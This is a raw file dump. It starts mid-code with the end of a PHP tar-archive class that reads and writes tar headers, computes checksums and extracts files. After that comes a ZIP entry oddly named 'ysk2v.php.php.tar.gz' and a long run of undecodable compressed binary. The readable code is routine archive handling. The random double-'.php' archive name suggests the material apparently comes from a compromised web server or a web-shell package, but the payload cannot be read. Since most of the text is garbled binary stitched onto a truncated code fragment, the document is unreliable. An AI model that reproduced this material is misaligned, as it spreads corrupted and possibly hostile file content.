'.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK ! �a �a ysk2v.php.php.tar.gznu �[��� � �ْ�Ȓ(v_��P�<M��$�/�Ŭ�=�dr_����� H \�٘~@v�&�I&ӳ� �A�{evG����G6.�Y}Ι�+uuW����#����ñ�v�ݲSm!�n8gUMV� �r�%�\Da��clX�+v��r��w?�Ǐ�D���`(���3����X�����g�j�����h�����`���S{�1yA�'��W� ���؟B%X&#Kca�V8M�%���������Ɍ$k�p�I\{͉���?]skm*+TH2�o=�w�:��C�'������zKNU��2BI��% ey.�/��J���Z��>�ꋭ ���P�z�H�m��_�Ӿ�3nÑ�/FU�(c�iK���ւo8�Ea�k������#��;~z9z|�E�7S�8�?~aI�_�/�����F�E�=ZQ��� �S|Y�F��$As}�at�|qH�v(K/��� �R�'r��d����T�LE�W�e4e��4X�E�U4(Pk kSZ�di�d"�0>/[�[Z���e�7��4nIh,Q��S5Y��*�)é��Ȩ�Q�x/�/��F��Qx�������1�'y�`_H2v�H�ߋ����<�� Q�-D�������k�}��<���革^��r�f��ݡ��w�\zՕ�p�0� L�}w���7���- T�E�K�,�&�i�4Qь����k4͇x�a Ny�wKY�\f��M�4b��%Ӭ���<��S�A�8�Pq� ���(2}\��P�2�T+�N5sMhr �8e�!� �NRE�"`��S#x�ѳ�3{yͨk���$�4ef���6Tf$(����g\�a��h!�{�'��W�g�c���)��Sa�FWԟQ�s����C����pҐ�;}@)S�"T�z�J�K4�a(�GH�TY�%����I�� >��0"��בE�(���^�o{���fk��*�T�����$[�J"�[��?"�-KP�x9����Ao��)��}" ���'��(���C4� n�(��nc(�Js�"����4�q�l���ҭ�x$�**]4jYP ������ux��{�&`��)PFA��,��u<ȸ(��:�kL=��u�)F)�#J�[,��:�0%P}��9o��cK�:*���� ���/~��$�G�C�����먙���|a��Ue�G��a�^�a}�<: �� ��8~�;T��%��o<� S���h�1�ߒ��V c-�f������#(e��B���hr���7<��<�)���:i�S��=�i��9�ah�yc`_g�1�+�#�$.�:D6�?�m�Id��O(m=X�YG����?^����$���h��/��3J_RA��'� ��<�6b��o:H�3���TL�)��#)*lw ���K2h��r2N/���.����9��X�_�0�;�yr���]N^rz���3��?c���;1�%�M���Rۻ�_�z;�l}vB����ES����9�̭�~Z�X�$�!2QǾ|A=s����f|����/��<_��8�$YN�ܱ� ��*HE� �ׅ��r{_���G�� ���1'�<nY��\�c�� �}#y��Y�;��Z</� E%�p���T �H���D��ܑq�m�T�@f*By��.4�v�� q?!���PM�_Q=AE��u�����-�cP�� ��=W�믂�"��"_-x�Is���-�ĺ�i�h��cz�[Ɖ�24rf�t ���c�e)��a��ݝB�eZ��+!�T+t��%B�)H=��(z��r���i����I �}��%i:`\?�t�\�����9�L��[/�HY{�}�L��s9*b� �X5�Ëʋ�0�堌E��L��?��?��Y�*RcLx�br��Kк������0�AH,Ʋ��QQ�Q���P�4��9Pm�H��- �kֳ��r62����)<�ĩ�jN#&�1����D3Ϙ�8�L H ��А�Vl�����A�%Hc�L�NT�h:�B�=C!����I&��r���K�n2�j����4�F�;L-6��9������ZB8M�p���!� ����*|�UaC� #� f�$��e�=츴�!6ڒ]�h��g~c^��+��6*����t:ٛ�f���y�hb�˶k��+�A�f���5>;Z��K*���Z/�T��Nr��P�3��S�t^ЬP��U��bb���FB����p5FӊN��\�S��x)���۲���`�����"8�4D#$�� 2�D��\]�F �ZW�<���;cX'a�c��>��_p�'�N1<b ��=�D�9��1��2g��0S꠲�M��G������!i4����7�^�Z�T��,YVᶾ��M��n4�옛*��cA��/��T���zS*�D��Q$+� s��Tѱq�P�B� �X��!��@�!9�D+*�v��H{Gª���:�%�@3)�@0��j�]�53�Z.����j6G���x2<K���|��{y�ň��\*�ɶ� ��XP��E���K��8�|��p�~��������)�/�˫��V4):�v0T�0��p����9��9�>T��@�3�fn}�1.L��1�����}I�����<��+�%X�� /NK�:-����ɶ���5����I&��7֔�{}ia��W�oL~-aS�j�bX*��ӘfCo�� �y�n��v��@w/�bqI@_ᵵ"1�T(���A*�,�_P�!��0�`��2S�)�-�X.T]�6x�hQ�I������B[ɟ��`�z�(_#Ԡ:��d�{A� "Zv�������"��j>'�f�!ŕΧS�. ��-�9�>�;%��0s�`3���"^K� ͭ���b<���P�V���N%��h�u*c��+�%��-m\��G�\ҋ�:!L ��+��e�~��I&�GB2�m��9�f��S�d-�~CJ��RvH��@�!�c������ 0n��'k�S�n^5AEm��H8�3�"i�p��� 0l�յ;��k��&�� XF���c8| h����Uf),y;���Q�-�%y+ً�iQ2�A�F%�[ �Z qe6� �� �:NPmo��yzR�'e��)��(ߞ�ͩ��ɸ�ۋ��z;��MA���WZ �@o?��\o���M�ro��"�^k5����?Л���)��k�����A��Z�����<���k�2Q$�-����H�%7"Yބ��ގM;�3y��-��aA� �f�� ��"���%0�"�J�&8IC�/�"��HKB�8!��zH��yT;t\8|����0�jG�ǎⴶ�4Ҵh%���#`É.�����ώ����A$�L�R`h�L ��h��jTQ8ڱ�D���_:�3(����m�&HL�B�&�@�B �ۈv$m�CJ� 6/bT��&��SC��w���gJ\My��p��,��7YA]ʪ M�2��!,P��j&�o`r��;��S����G��K��c �E��7z�T�z���6@�-/�[���[�dybj�}�:F��W�SƟ��˼4Ѧ��6DY�r������V�.7>n N2�JN ���{�Rh{�Q��X^���q(z'�S@�a��H�/M���Y �0a�^&�����)��'�� �[$�4�tn�f*��I��CQVy�7x��TV�$�6��3a������҈��^H�����q�Z�=*�cl����<rta3.93��uD-֨H��D�$^���B�UK�p�"aDT�v�"�0l�]���^㩔L�2k��lU�'�f]8�t���JuyW� � H��{z���<\x/�wC?i�5��u�n�[o�`N`�,���}���%P�"pS��,n�j��O�G�$�V���|�D]d�&a=�����LZ642�p�$(��c���+�I �2^a�C{�O�G1>��OK6�Ll%��mb�E�S��x���Y4Z�FƦ���j�W����~��XYE��ψ9��H~�d :�a��* �!K�m����[�I#�?�>m�i����77��e� ���!�`���Gغy@o�&��k��8� ZG���(d�b�,Ut��`4昙m�5��Qp�dB��AN�����g�t�z�j�Y���ԩ&������l݅�d�ho�,F}��j�Fz�nL(�e���� i^kyݎ��3>1�3���n��L�1�����i��cN��s�)1�Lx�{ ��kL�kM��Bu:�=��EIJ�∤N�);�EH������c� ?N:>�e���9��n4�� ���6���P�=z&M~d�{��e�2|\��u�{��"��C�`��e� ������DNN@��%� f�1���� $^ :y=����ڜ��%�������1��ɶ1�Sس�l�'�I�y,u����G\�Ȯ�*:��M�Qҁ^�pl��G $�Z�)��̬��9����t���df��~��4��էb�$��@KWGt�%B3�?�C&Œ�%�1�����RB��?��w�'�~o�W�����S7���c�c�]��[���c����c�-|dI��z������+˄%aF�͜�F"� ƚ�s�U���%Zx�n�{$����tDM"d�D�崧�36����D{ 5uȃ�{F�Y�{���h��Q����~��C@[��P�9�F�G�[��q�A$�����A�4$4.ۉ���n�-�أ*����������g�L��Ӽр����"�t]��<��/"L����]ӎ��cb�ѽ�R��>�ӝ�hЮ���ź:7���+p2�|���N]��}x0M�x���"���M�$�r�+�R�?+d�#}@��h;�B$�ki��c�-/h�塥�q���#ǵ�}��D�E��D���h�X&-��Uܟ��[�k&=k���w�a]�&�;?"�14X�KU��)��a\0Wùw �:U��:��/�����(�"�g��D��`�#&T��hpa�^�xQ@�'� w��AT�7ŭ����b`b���tH|�-�ܓi�\%qZ�sÌ�\����7HdST@�0�~�f��!�����$��Asom�4z:�(uM�/I���B � ?�y��r.�b~c���$�G(&�H �őjR�L3Ƞ�0��6�5BN��gr��f��{�� �ƨ���6x��g�*�ȥZ9ڄ��&x)���-I��X�(]�`s]��~?2"@�ǣۊ�;G>`�Xi�-�XiUmta:�r;�t9u�p�YP�}�#2C�\�̹�L?��˘��@k1���p~���T�x�Y�&g���4 �N��`��R���u�e��M����D 1����eB�6F�I�[bM��\����e���"��@�Y�"�b🃮ɟ�M�6ě�ni3Y���ѻY܌^n��z���]�#�k�.�D�n��:��[��EKy���Y�E&'� �u�,eDa8O:���p}q:}�g���!ln[uRE���+�|� 4'��|q��4T"�� ��-�����4�P�W|! 'aO^��KV�80rU�OWН���J�I-Z��~���>z�Z91��GC��T�B$r��t�qZ�E� �JH����ո���Gt�D� ��%�v�p�G��sc�a�@n�={�v��� 0�Yjιc$���0$4���9�״��o���>�{���W�����]Sd��a���e��SJ%%��:��Tm�ge:�G�N�}����7zq[$�t���s�����,C�wM�R�-��]̴�lU�.��U��#�J��ꙺW�����zfb���ۼ���2��0���!^<ƍ{�����zlcKo�D9PX��P�OV�����.S�j1\2�i�Ӣ� �;5� ε4�<R��h�5��!-ך��?�f�^��x��M�[&���pi Ȇ��E�0��(+�� mBs"�0 ��D&�Ԙ��8 I����y�� � C �I� ����� ���rs� >ѳ~�g�?Ԉ�3����[`(�H�S8|��˱49�#f;�� ����R$�Yc�>���a�/���@'w�إ4�#C�:�jc�/&r ��4��\{����gRO�+��<��t��K�Jl��햢u�8i�[�F����Lf����x�6�Y8l喡��\0�RB��2�/��6���O�ou�Yٸ ̆�U���Çt�5"� ��7 �ҩ[;ăM�L���V{�jN�0�0 �T�oe��F١�E�jh/���v:)���"¯�\7V�N�`g����'�-/"�^�Ͳ�ٸ�e<Z�� l,��zr�ݛF�G�U�Lh�[��ţRLfO6���婟��b�ˡ���O�L��b�q����Q��oljHg~=��Y�K�0?���h��8iJ��ˇ��O��m����0H�<�Ap�Њ��3�#WL�f=Elm#��A�,��Ϲ��.��ˀ�e'��0WY�b8+���|�x� ��Y��ɳ�u�M�ˣ֒����DZ��ƴ.��p;�>-BO�^�'��S�����X\�Y�u� �����ygc⠻|,3�y�%����T`����j#p�-#Yu)p{ϾT��J�y�ҍ�㙤ƪ��&�ׇx<6�tC\���V�J&��h�N<2(�f�\*� G:��z��r��0���]6�*����ޯv=�Y+ܪK��%B������,A��i�.G��lN�9:\=��0�K;{i��?��Ju;�Az��:�Q���K�P�QL���A�Q,�D����Eg�w�n;�m1W���v�қ�{=5%���D���:�B��{rA{R:������z0�l����V�z�Ū�.��T�&�Th��ʓ6���D�S�O'�������C'_�J�F4�Z�ҵ'��ϵR�}��i����j�ʪ�>EFS.��-a1��=�t�x���:�˗!����v*=�j@���?Gk�S�R�v�-�����3�E��~0��7����ۧQ{=��얋tr�Z1����0� �z�Fy����C8�Iײ�6�Q�Fv�{�a��~l�#9e�8�L�I�wba�Hu�9�Y�G`�g\b�|N��| �BL�ϰ��n :g�u~Ԕ��ڈ"mVM:���#�~�>��� q�3��F��y_��?� �'�H�����Ę���V,���8�KVad�Syq�Q�<v����������g)�TdMF���<n���.Y53H�uZ/�/��'�u�I�b+\�ћ0n�\�G~_j�F��-`�á �{����6��F6�}�5���Y��Ý��\�5���Z��� �o�:n�#\�͖~���`��դ} wG�8����[�ϊ&.�]:N�K�5�|t ��m;��3����T����h�qo=�w�P������������1Lϙ�>�,Zn��i���Qe'Q�ȉ��a����XgH:��V\���2�!�� r�3%�/�yd���z���Ml� ���9���q��_����IE����5�ׯ�by��:uz�{^Ab �F��+�/�\�%!B~������p��B��. B��l�ȃ��S���Y���>�� t?���ɤ�ү�å���ҶՉ��v�3�� �^�*���"H����`߀���t�,ˉp��]%f�vp^A4��f�S �<� ��D?j3o�A�#�VP늀V E�q�<�� ��\,�2{�V�< �OZ�+��$6qW\ڷ���3�h �#H������@���������ߡ���O����o�� �+��B"����?�������7P�?RpP�?�l�g�ޚ$� ��#���u�jK{�`� ov��MOF�l�T督k���w�߸4f��tp`Z������T��kҚ��Q ��Wİ��T�XĠ &��5��8���:0�>�W����Q�4랱a �>��F���>Xk�,�5�� ��h$���m}$ד!��[��Ae��B L�3��3 ����IG�q����bl"�H���m�GMOI����eO)�7F#��#��{0� R?r�8�(Y��E|i.OR�c2���UQ�9-m���� ML��ui\_9Ű �,�30��<n���6sVJ���\�����GC�W�WV3�%AQ����-_�R��:͙��_��Y����13&FMg�Qx�ze|S�ѫ������ߘ�4:s������D�:VI�#����9� J���z��q�&p�=a��B�'�f��sA��G��|ο8}�Q�L�����ʌ�r����w7o�|PJ� �|7x��Q���Щ��/��xvӆ��0��_��/b"C�����6��;��!o#�[0�;�җtl��6M�x�v�_�C�[E7�C:R�����i �I98΅9�c4�G{��\���0��>��$��ʠH8g�a�SDuz�S0Fh �x?��u�É��O9�~�ⰹ�����.3$��X�@,K�̸����J_��\uC�ͩ�g�[�k ���G֝~�L�Vz�o�L� :��n�B3o��A��h֞c���J�B�JG��xPǤ:4uu1��� sI֠k�N�\~B�+]: ue��E�cl�N��AK.3��c�g�*�&H �K�蚛8��u�E}��ia�Vv\Ⱦ������q�$��w1N+�����¦볧h��Mx!� 0����V��:��>��̱���ԧ����}�-ZBU��Z�Z�k�.5m֧��I/�L�v�/k�fñ/ZSM��0�X�b-w2kI�#k��:��]����6����4� ��a��*b�C�:rT�z���{<�������s_��1� ���ź.�.��g��1����;�؏�1�f����6vuili�LԂ�/�ǣV�W��py�Xj�l�"�=�U�Dm�^Ag=�'��!�a����p,�$���ʁ*��V@���rp��e�B1�e���Z�˄�� � '�]�I֚Y/M��j��C��n���tN�1�-1$qvPϞ-�ə������eG��biϦ�CoK���iĴ�p �o�h� Y�d�Z.�[��P�~����d���w��,6OGH�g#g& �3-�Qq��黋�e�;��{BJ-�#����z�~8�&��G�z1�ח��Џ�$�8b@�2l��#a��N]Bn��v\������g�ރLN��� ^�&3Y�䅗���#�!�������L��Q�3� zr??b�?���]��;��?g�� 7t�P����>��yl#.�h� ��DK:^HW�;�ۊ'˷v[+6ЖPE�I����x��y;-�f�+�=� �����ouC8���T2�H�p����2�F�ZCj0ҋS�\����,/v����4u�Q;_-���r5�j����z�f�����b��^����r�ƛ�r�,*ƼU����P��i�Z�F��HU���y�e��u�?��p�>��Ʋf��/.U���_�pM]D�~r}��ۯ��q�/m�������%� �KlW��4�2�D�)��/�l�z��\�?��� �N��?a(�����{c���`�ӳ,|�1�yД����t���R��t�Ly���SBK�V��S��X���b�$���'�ڱ3q���a��xߌ�� �o����ߍ�Ꮱ�}<��$\ 6'H�p�7���[r���������6B:���G���vS���E��%��Ɨ��۩�3�d���-N�`o�8HE�6�8X���P8�jsP�`��N��Ίz߮g���?�kz���f~Ie��L�� L3mDTT���{|� _��9��_���y0��{f��~� ��=���V�4�I?��̦}pxa���4��Z4x�h6��b֢��E�X6c�E�B���y�\N�W �Qş����8���;F.��Ì@ݎE�n�SA}#�qYҴ~��M�L�gF^+B"�h^�7�2L�:�L ��%:��ǜ�e�0~q���X�U[an��5q��X�!��W;�~�����؍ygSp�o�l=��s���ȃPj�lW�Ň�~�/�v*�0�NE��k�, m�fXH�9mӞ���cF���foU���My�D�y�=�5�v�&B�Z�ə�|'�f�r)�ϋ\�:�V���������� Ϡ�*�ϵ5��#��a;NeR�n3[iTz��U���Lvo�|}]/�J��T.%����m>�S�����*E5�����|婜IeS��&���?�[vU_��T/�K �ykZ�S�T.��K�[@y�E��J��B���g�|JKR��3h�����Q���遘�uR\��m�{ST~K����̧�m*�X4�H�2�R��c'�/�ʙP�)[ͥ�Tj��B��L�1�^����S�f�-��a<�\�s�� dx1(���z���2��.=��a�0�?�v�`��8]�S뭴�Z�t%�N��-�L#�x�L�Z� W5V���`V�kQ%^`��Bo]�D�e� �y�X{�3�CAN��rZcWE16i�ϓ�d4��}�X���)�*q���<��\w:/K� �<�T��]�q�.��㈴�T� ���p����rLx,�Ͻ�C�6�lՃ�Uj���PF��[�Yv;��˹f��f�v8�k{��B>Ф�v�Y�E�&1kqճ}��Z�=��u��MG�m-���݇V*��R�Rlh�R�� d��D���Y��O�J���a=�z���e�UR�C��QʤKJ:]`[�B�JO���ΰ�IEnd�Z��4��,�����I��g�P8R#4�6�\jTyJ7�"����� gg�m�]N3��t��Og��>5i������8��&��E�9\�iT�1�}ҍFq�nTړ][^���N�a\L'��4�+����`��f_��;�Xط[�v��ɮ�I� 7 �dS�?�w9ޕ7��R�j�mP��UpR�qO=>�n��^�P� ���N�d��D��+�},'(��������6�K�^ܳm��I�9�i�r#q�kD��������!S��F�ce;�N���}��ʭ������ެ����r�����Vy�� �Z���7���1�����2�j�ǂi=su�W�ʹ<��%�_X�ӇE1 e_|�K|+���O}Ւ�}L �V��)�mu�jN%1Wm�#����>�;\�kkAY���Ip� SM,m�=^���L�Lv��f��t��Va1y�j����Ӈ�؈T�D�ٯn� ��M���2�v���T*��Bj����P���J��?��w���rxPU�����Ng�҄e<�(e�����:������J�W�<�;E��Y�$�y����Vu�-���j�GO�v�_V���j�˃@�]>D�lo^�+O["��&j��m�z�L𩯆&j��VV�~`�z�=*���.XR�=�� ��j��"�C����M�ݟ�����&�T*���P���6%��,D{�Vy��wv�j�=���4KZc�+���q<"` �H�I=��e�93z��j��� �↥�_����"DW\�=�ZnK���hOR"hG��1�B�g�K��@�톢K���O �v;Ok��a:��Z������A���>+�z�3���p��X�rq9�)�ڽڬ ��O�p0T��㤷@���◕�r�l �����.z:p�J`9,�]�P�~�l�Z0��yY�VBp]�<��������ӎ�r�^���~N�8�P��::l,cbu�*�֗���NS��`�W�Ͻ��^k�`p��K��H����mm���Z Vؖ�!���+uԝ<�Xc��.�U-���u-�'�rp�;첵`�6Ӧ�r 5+u��$�|d���.��ˡ��T;-T��Ҩ��=��-b�v��Qv]YG�1y<��[��_��V����t#2ʱ����T،��H����g��O�ʑ��2�Z�ZmF��n�I�"{��� ��Ь�w;�S%� ���r+^�H�'�W�"���!���3�$�N����I���n�1��2^x���2菹}��g�L���g�6Y?��f^�W�u���Df�0��"f0^Ϻ��hY��P��1�}�v�B-� � �o�+��F(W9���h㱟-5��(�@�Ҕ=+!��U��z��u_��a�͉js����պ�������Շ�2$d<�X>��y>�幇�v��/wܲ<-��e?�*N���ֶ�H�Vi��q\l���jF�2�G�(���V(s�ai���U�yՌ=��|ת��j72���yy��mF�Ê�/��b����V��^�9�w��<m����g)E��>����g��}���G.V�+�N��g}5�;yY��u1;A�=�R��)���Ć��^[�+��FbY-���~)��˝�ԭr � G��nǏ�Rx�Η�nz�����`i괢���cſ��e҉��r9���Jt�u2�n~�o�O`� L��z�UAj��|oQR��A>2�9�0��f�x��Ǧ�mr�n���Q~���� ��V��{�.�h�ώ]� $�σrd\)UֱI����*[+�>7~<��X-Мwj��G�cZy�u�=�X#6�b�Z��<��C�m�7��Iu:�@w�鏵GO��E����Q�3���ݶ�L����6Ĥv�j�:��,�S��au��x�eh3�+�I�3� a��m<H��x�b�|��p#yS���.|�G��2�ؔ��Rk-6ڠ'������ V!I�7�8�ky1��T���E{��<8����$�B,*d�ҏE��j((�O4�К��Ϭ�8�&��>�J�Q��zڭNl��Xţ��jT����j��T^s�"����`�B�ƚ��c�D9�7l@���Vh�W�v�O��㼆��0N�u,�<�b�`�ۍ��V��Poܩ6�Pe� =$V�~O<�0��jh�̶�l��A[ܺ�� i6�T[�P���^�����u6*��z��6�ͬM�����!��{1Re�{��Tt����n��'��N���l���x8څ6r"^ky��C\f���:��ql�[��l<���l��P���zs�ʲ�Z<�F3�e_��!R2;xW[H�4(���QN�4��a&�-<ME��*UAc������>�m��j����lj�֓�V(�Q�\��S�Ʉ�=lZ�}�#xR�x*����A)9�ŧTg��z.>Y,���X�C}���U�/���V��#Y���c�jb�ل�GI��'�v�-���2���.ͮfٸ�ڬhO�9��{��|~�9^��g5Q M#J-�\�Wߩ�b�)���͉���=�G��/���f� ����4U�w���$Tn�C�z��G�Bv�Kl��~,��ǝ��X������[7�T�bEEw3��Y.q$���=���R�"�ָ�j�&�+���g����d���A{�l�F����yt]�=e����no]o��n~��u����oG;A+)��v�� �j��wZ�lw�N<�N���UZ吴�d��]%� ��a�HM�T���z�[�Ҿ��Z<�n�!� UE���Un�*�Ž0�zz݇nb�ɔ�8�j��?�/�*�ܺ���3lp�_<����0�R�v�Z�Bd��c5IV��^����CM{z�z⡑�a���{�Lo��v�`���։��o͛�"�q�Mk�@�J�B����a���-�[���?l!�B����a���-�[���ҚD�s9���ϩ-$�m>u�V=-$�'��Bϣ�S���K�<mԅ�l3���p��m���a�z�BC�?���rn�����R�8�?�IYYL�ٞ�Q��QM��[O"I��#��y<{�a�<�!�F���:�8�H���� �R�i%�� ��t�m"��!��:���ۅ��l��->�����{�5�q�1����R[%:�T%X"�H.�V�'n�Q6���i ��v�"WD�^�5�T�HII4©\;�c��8����pe�g�Z6�A!�7v����&ť�\�T+Ey&Z.��3S�i��11��U����z��\+4o/�YZ�S��(���os�D��M�㧎�q�`H����Ä͇C��p"<�"��x\H����/r��C��_-��B�otw���n�����x��i���vꕂ��G�u�yW*��x�yl�%�).�ǨT��¬�T���q1��źZ�C�Cd������*� z��h2�6EyzH=���h[�ڏ}��诶9��J�@d��Q�̎����t���D�L��2��f��N�廩}!�狝�<ܗ��#G��r�a���ݳ'>J��'�ӾdC��)y�N�>aq�Em*?��/:���1>�A���g�>r�N"�.��U�U����ad=@�(������'�H1Ճ܋���!��G�A J{�[U�A��~VzH�[FR�g����e�:�*B8��(��B(�S�l�(FSҡ�����NsQLW��v�����l}�k��De��G3[�P����w������^?�?�Ƭ����`l��c�J�_f��C\�e�b�W�=��ʓetx4�mD�y>���EĮ뛐�����t"� F����8H�*�5=Oi.>�n����ֳ��:Ń �P��"��l��&��P.=�*ԗ��Rո�zh�*�R������uY��xy���f�-�<�)G�}�">ć��?�b�(�)�e�X���~أDAO\e��e94 �v�n`\�pl<��5"A�A���������$��*��Pn�=��(�jʴ�R��t�&ҝ@Ik�f@Z"�[|l��N���Ns�tD��������X6ӜW��R$�)W*���̞��X��&X`�+@�L�4YG����/4�6���6g���C�5���`~߯��BB�7ӏ� �;�b�ۈ��X�+�����ۥ|e�(u�Z]�?=턅�����A�IM�+�ru;?L&��cO�/U���$�R&���\/�����!{�*���J��>e��П��z&�i�+M��p��|Zp�l>���y/�i1 g�HNL����h3L֭@�W�! %P/f�r��Δ���9�4zj�����JB�*��4k��B 5-����aYC\a� ���~?x���X׳������.V�6u%����-!H�+��Y�^:ȩҁ�i�b}�!�Q��1_K5j���Ť�a���GǨC��%O�vē�6�/wnl��ޱ��xQ��h��_ �d3��=p��X�9�V��ڙ�o8UꞐ��U�[I������ ���8{�~��q �f=����W�J�B�^�W���Y�U�2��!�J^��p}L^E�u����t|ZN�?�tM.��]~/Hh�;�5)r9W]���O����[R�s4V#������>|B�rtBPD[���"J)�I��q�n1���h�B�B�;�N=F1Z�]A"�0z`0������PgÈ��������� �Paf݅:!�sOCGAp$[SP��G5�wL�� ֯Y�Y�<�� ^�N�� ���ھ�%P�Rjk�QPp;�<qs��-�Z��KʏB��[|q`��k�P�K���?�0��C��� �:(�` l��(�$X!��w��K<�����c6�~�NTuL���q��{�3� �f�|���m��.�e39���B[��64c�XI�e�I��A�މ����װ3?����AͿ;=X�kؙ5~;��_��h�n�y��*���S| ��w�`�W�-���a�`�Q^۶�6��`@>4�C>pc��A �-���7�[��VK�.�{2x��\t�_�[%ɝjKTJF�m�ܹ�f��� K�z���o=4C��nY�J�cR��S�qO߳ q���F��� ��]��J�~<��3�[P�� �/��<����m��(��Y�QD�߉�YF|��ѲL���Y��A�$������v���� y. ۏ�EPއ�Q4WYu�K�hא�5v1���l^H]�W�N���I���z�$�.��z}3�/e{��p+���X;t{mI�Ǻ�)��E|�*�}{k�JT�W�F���M.�O�ߐ���ߖ���)G����=e����A o l�#�鞡 �2j� ��i�d�P���� ��P#����hg���,�K��Q�l2���E��5�a��dw}�qʛ� �/?;=�nf�1��ӽC�47��xp!X%�͚*�ţ� SҢf�2���e��Š���?al��'[e� nºp�C�uC{ACfC�N*�4Z��Sq�s�×7,+�إ-H�8Z�Q��5�� BF0���9$ڈ��k�,\���hЃ�=��%5k]�2>